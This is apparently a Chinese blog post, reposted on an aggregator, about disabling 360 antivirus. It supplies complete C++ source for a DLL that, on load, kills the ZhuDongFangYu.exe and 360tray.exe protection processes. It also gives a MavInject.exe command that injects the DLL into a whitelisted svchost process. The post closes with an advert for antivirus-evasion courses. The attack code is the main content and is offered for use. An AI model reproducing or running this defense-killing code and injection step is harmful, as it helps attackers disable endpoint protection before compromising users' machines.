首页 > 其他分享 >杀死名为360安全的软件

杀死名为360安全的软件

时间:2024-12-18 18:31:43浏览次数:6  
标签:case processEntry DLL 进程 软件 hProcess hSnapshot 360 名为

参考这个https://bbs.kanxue.com/thread-281120.htm逆向分析以及我们的内存搜索,我们可以发现许多白名单进程,特别是一些系统常驻进程。白名单进程因为受到防病毒软件的信任,往往不会被严格监控,因此可以作为攻击者的突破口。

在这些常驻进程中,svchost(Service Host Process)是一个较为典型的例子。

图片

svchost 是Windows系统中的核心进程,用于托管和运行各种服务,具有极高的系统权限。然而,svchost 并非PPL(Protected Process Light)进程,所以我们可以很轻松的对它冻手

图片

// dllmain.cpp : 定义 DLL 应用程序的入口点。#include "pch.h"
#include <tlhelp32.h>
// 查找并终止指定的进程bool TerminateProcessByName(const wchar_t* processName) {    // 获取系统进程快照    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);    if (hSnapshot == INVALID_HANDLE_VALUE) {        return false;    }
    PROCESSENTRY32 processEntry;    processEntry.dwSize = sizeof(PROCESSENTRY32);
    // 遍历进程列表    if (Process32First(hSnapshot, &processEntry)) {        do {            // 如果找到匹配的进程名            if (wcscmp(processEntry.szExeFile, processName) == 0) {                HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, processEntry.th32ProcessID);                if (hProcess != NULL) {                    // 终止进程                    TerminateProcess(hProcess, 0);                    CloseHandle(hProcess);                }            }        } while (Process32Next(hSnapshot, &processEntry));    }
    CloseHandle(hSnapshot);    return true;}

void kill() {    TerminateProcessByName(L"ZhuDongFangYu.exe");    TerminateProcessByName(L"360tray.exe");}
BOOL APIENTRY DllMain( HMODULE hModule,                       DWORD  ul_reason_for_call,                       LPVOID lpReserved                     ){    switch (ul_reason_for_call)    {    case DLL_PROCESS_ATTACH:        kill();    case DLL_THREAD_ATTACH:    case DLL_THREAD_DETACH:    case DLL_PROCESS_DETACH:        break;    }    return TRUE;}

编译以上DLL后选择你喜欢的任意一种注入方式,这里为了方便演示,我们使用LOLBin进行注入

图片

MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
大家伙,如果想学习更多的知识,可以看我们的论坛:
 哔哩哔哩有免杀基础课程,搜索账号:老鑫安全培训,老鑫安全二进制

标签:case,processEntry,DLL,进程,软件,hProcess,hSnapshot,360,名为
From: https://blog.csdn.net/UUniversity/article/details/144566755

相关文章

  • 软件工程
    用例图2.类图和对象图3.顺序图4.协作图5.状态图6.活动图......
  • 【亲测能用】专业科学图形和数据分析软件:OriginPro 2024(附绿色补丁+安装教程)
    软件介绍OriginPro2024是一款先进的数据分析和图形绘制工具,它在科研、工程、商业和生物医学等多个领域中被广泛采用。这款软件支持导入和导出多种数据格式,例如Excel、CSV和文本文件,使得数据处理变得简单快捷。它不仅提供数据清洗、转换和统计分析功能,以提升数据的准确性和分析深......
  • 如何选择最适合的业务流程管理软件?11款推荐帮你高效决策
    20世纪90年代,全球化竞争愈演愈烈,IBM信贷公司面临着前所未有的挑战,融资申请流程低效且复杂:每笔平均需要168小时——整整一周!这在瞬息万变的商业环境中,简直是客户体验的“灾难”,更别提对于业务增长的限制了。就在这个关键节点,IBM果断采取行动,掀起了一场声势浩大的业务流程再造(BPR)改......
  • 网咖营销软件,网咖营销方案
    解锁网咖管理新体验!旺云网咖增值管理系统,让运营更高效,顾客更满意!大家好呀!今天要给大家安利一款超级实用的网咖管理神器——旺云网咖增值管理系统!如果你经营着网吧、电竞馆或者网咖,这个系统简直是提升工作效率、节省成本的必备工具!一起来看看它的强大功能吧~1.无人值守,解放......
  • 2024年免费项目管理软件大盘点:10款高效工具全面解析
    随着技术的不断进步,项目管理软件也在不断创新和进化。2024年,市场上出现了许多优秀的免费项目管理工具,它们不仅能够帮助团队提高工作效率,还能促进成员间的协作。以下是精选的10款免费项目管理软件,其中特别介绍了禅道项目管理软件,并提供了官网链接。1.禅道项目管理软件(ZenTao......
  • 2024年免费的10款顶级项目管理软件——完整指南
    在2024年,许多免费的项目管理软件都能有效帮助团队管理任务、协作以及进度追踪。以下是10款顶级免费的项目管理软件,它们各具特色,适用于不同规模和类型的团队。特别地,我们还包括了禅道,这是一个非常受欢迎的开源项目管理工具,专注于软件开发管理。1.禅道(ZenTao)适用团队规模:中到......
  • 冬季限定节日游戏工作流优化,6 款办公软件哪家强?
    在游戏行业的节日盛宴中,每一个新游戏的上线或重大更新都是一场与时间赛跑的挑战,需要开发团队、测试团队和运营团队如同精密齿轮般紧密协作。而可视化团队协作办公软件则成为了推动这一复杂机器高效运转的润滑剂。本文将站在全J人游戏公司的视角,深入剖析6款此类办公软件,探讨它......
  • 国标GB28181设备管理软件LiteGBS搜不到网络摄像机时应如何操作?
    在现代社会,随着技术的进步和对安全需求的日益增长,安防监控行业正经历着前所未有的发展机遇。从智慧城市建设到个人家庭安全,从企业安全管理到公共设施保护,安防监控技术的应用范围不断扩大,其重要性也日益凸显。智能化、网络化、高清化的趋势推动着安防监控系统向更高效、更精准的方......
  • 什么是软件安全测试?
    软件安全测试是确保软件系统安全性的重要手段,它涉及到多个方面的内容。一、定义与目的软件安全测试是一种测试过程,旨在发现软件系统中的安全漏洞、弱点和风险。这些安全问题可能导致软件受到攻击,如数据泄露、非法访问、系统崩溃等。通过安全测试,可以评估软件是否满足安全需求和......
  • 什么是软件性能测试?
    一、软件性能测试的定义软件性能测试是一种通过自动化的测试工具或手动测试方法,对软件系统的性能指标进行评估的过程。它主要关注软件在各种负载条件下的响应时间、吞吐量、资源利用率(如CPU、内存、磁盘I/O、网络带宽等)等方面的表现,以确定软件是否满足用户在性能方面的需求。二......